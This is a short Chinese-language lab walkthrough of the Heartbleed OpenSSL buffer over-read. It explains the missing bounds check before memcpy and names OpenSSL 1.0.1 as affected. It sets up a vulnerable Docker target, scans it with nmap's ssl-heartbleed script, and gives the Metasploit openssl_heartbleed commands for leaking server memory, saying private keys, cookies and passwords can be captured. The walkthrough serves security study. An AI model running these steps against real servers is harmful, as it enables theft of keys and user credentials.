0x00 漏洞介绍

是一个出现在加密程序库OpenSSL的安全漏洞，该程序错误属于缓冲区过读，即可以读取的数据比应该允许读取的还多

0x01 漏洞成因

由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就会以每次64KB的速度进行泄露

0x02 影响范围

OpenSSL1.0.1版本

0x03 环境搭建

使用docker一键搭建环境

docker-compose builddocker-compose up -ddocker-compose ps

nmap -sV -p 443 --script ssl-heartbleed.nse 192.168.220.134

使用msf对漏洞进行利用，查找heartbleed模块

msf5 > search heartbleed

使用第一个选项，设置主机IP地址、端口号，设置verbose为true以便于显示泄露的信息

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show optionsmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 192.168.220.134msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RPOST 443msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

漏洞利用成功后可以抓取到信息，包括服务器的私钥、用户的cookie、密码等